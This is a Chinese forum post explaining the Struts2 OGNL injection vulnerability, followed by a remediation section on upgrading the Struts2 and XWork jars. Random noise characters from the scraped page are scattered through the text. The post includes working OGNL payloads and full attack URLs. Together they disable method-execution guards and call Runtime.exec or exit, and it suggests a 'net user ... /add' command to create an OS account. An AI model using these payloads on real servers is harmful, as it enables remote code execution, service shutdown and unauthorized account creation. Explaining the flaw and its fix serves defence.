|
1、struts2漏洞原理 j8 h4 s9 @- _1 |, S7 c' {$ k! D
Struts2是Struts + WebWork。WebWork最终是使用XWork来处理HTTP参数,是通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL语句。当我们提交一个http参数:
6 n4 L/ G% X3 C6 b?user.address.city=Bishkek&user['favoriteDrink']=kumys
6 a$ Y; L" v" b; p5 c k- K# H, b& FONGL将它转换为:
9 n! s' Q+ m/ P2 M6 Gaction.getUser().getAddress().setCity(“Bishkek”)
8 I. ]" c7 t$ R* w5 Baction.getUser().setFavoriteDrink(“kumys”)
( i6 d8 z! M( c这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()方法来实现的。除了提供getting/setting方法, OGNL 还支持其他更多的用法:
) r" |- W5 X5 k8 M方法调用: foo()9 O8 d6 D/ a! t& {
静态方法调用: @java.lang.System@exit(1); _; r, }: V: o6 [; l
构造函数调用: new MyClass()3 a* h# n! ^5 G' c" W# ^' @% @
向上下文变量赋值: #foo = new MyClass()) a5 h- K$ A: K- ]6 H. U& Z
…$ I5 X, q+ x; Y7 w
因为HTTP参数就是OGNL的执行语句,为了防止通过HTTP参数调用一个恶意函数来攻击网站,XWork有下面两个变量来限制方法的执行:
: Z! |7 m/ H; ?4 |2 r2 wOgnlContext的属性:xwork.MethodAccessor.denyMethodExecution (set to true by default)+ Y: [; T0 @( q+ ~* a' Y5 |; p
SecurityMemberAccess 私有属性:allowStaticMethodAccess (set to false by default)
7 t: F. d8 X/ k# ^) R l( @为了方便开发者方便的访问变量, XWork提供了下面几个预定义的上下文变量:1 l% g. ?! }. ^7 R S; L) R
#application
, e& y& n) G+ T" |) E- C#session
5 W% q. [$ S% x, C' D#request# C. ]6 m+ Q8 V7 Q2 Q/ F
#parameters
! ^. {8 \! o) l$ _! q3 s( h+ y0 C#attr
7 a9 t+ y4 [9 ~* ~+ L. {这些变量代表了服务器端的对象,类似一个map。为篡改这些服务器端的变量,XWork的ParametersInterceptor不允许在http参数中使用#,但是可以使用Java的unicode String 来代替: \u0023。
" D' M% k' @1 ^除了上面的上下文变量以外,还有下面更多的变量:
2 }6 \3 Q! b; O. z G1 D) ?#context – OgnlContext, the one guarding method execution based on ‘xwork.MethodAccessor.denyMethodExecution’ property value.4 x) Y, h" F: O# t9 ]) L5 [. V
#_memberAccess – SecurityMemberAccess, whose ‘allowStaticAccess’ field prevented static method execution.0 F, F2 _' L! f% a
#root
* R8 b- F/ A& |. w7 n( N+ c8 h5 m {#this3 \: a! x4 L8 }/ A+ N; c2 Q$ `/ J
#_typeResolver
* z5 [/ o" t ?5 S5 ~#_classResolver( P+ {4 @& x* v8 q" n% B
#_traceEvaluations
+ j6 v; |2 b" ]* g) m0 ] U! a#_lastEvaluation) a' r" y; S- L) s8 }
#_keepLastEvaluation
/ L4 T' R$ _. ~! A& @) B% N从上面的信息你可能已经看出问题了,我可以修改这些变量的值,然后执行一段恶意的java代码:' I ]6 C6 C) x* R
#_memberAccess['allowStaticMethodAccess'] = true
& ~7 P, W+ S; I8 m#foo = new java .lang.Boolean(“false”); ~7 o: {0 o" n
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
$ V, W% @9 P( }1 y( R: u: H& B% R#rt = @java.lang.Runtime@getRuntime()1 o8 R& W6 O$ D, @& T$ h+ v: }0 r
#rt.exec(‘mkdir /tmp/PWNED’)
, [- T6 K# t+ } v) S$ U6 `& A5 Q另外,你可以使用下面的代码检验一下你的网站是否有漏洞: http://mydomain/MyStruts.action?(‘\u0023_memberAccess[\'allowStaticMethodAccess\']‘)(meh)=true&(aaa)((‘\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo’)(\u0023foo\u003dnew%20java.lang.Boolean(“false”)))&(asdf)((‘\u0023rt.exit(1)’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=13 ~7 C& a: l! K& A/ a# B2 M7 ~ a
旧版本的XWork没有属性’allowStaticMethodAccess’ 可以使用下面的URL: http://mydomain/MyStruts.action?(aaa)((‘\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo’)(\u0023foo\u003dnew%20java.lang.Boolean(“false”)))&(asdf)((‘\u0023rt.exit(1)’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
2 h" k2 o" P1 d* l( N& G6 m$ j/ u$ G0 c' @OGNL处理时最终的结果就是3 G! c7 D- D8 }
java.lang.Runtime.getRuntime().exit(1); //关闭程序,即将web程序关闭
, ^7 l+ {- Z3 n类似的可以执行
8 `: r7 ^4 P1 Yjava.lang.Runtime.getRuntime().exec(“net user 用户名 密码 /add”);//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/),只要有权限就可以执行任何DOS命令。: [2 ^4 D# e- ]+ s1 {! B6 ?
2、struts2漏洞解决方法% r' d7 X4 e' ]# x3 e) f2 B
将struts2的jar包更新到最新版本最简单,不用更改任何程序代码,目前最新版本2.3.4。主要用到以下几个替换掉旧版本的:# J" w8 F E, r+ ^9 K
commons-lang3-3.1.jar (保留commons-lang-2.6.jar)
) a$ s" K( n% Ijavassist-3.11.0.GA.jar (新加包)
& D/ D9 G. K. C# k) _ognl-3.0.5.jar (替换旧版本)2 |& U$ P: h7 R
struts2-core-2.3.4.1.jar (替换旧版本)
9 ~! i& {- ~% ^8 P$ N9 g' s, i) |/ pxwork-core-2.3.4.1.jar (替换旧版本)
) z3 ]2 F1 j2 G6 D# f$ p3 n | 
/1 
|Archiver|手机版|小黑屋|科帮网
( 鲁ICP备19059327号-2 ) 
窥视卡
雷达卡
发表于 2015-04-18 20:59:48
转播
淘帖
分享
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡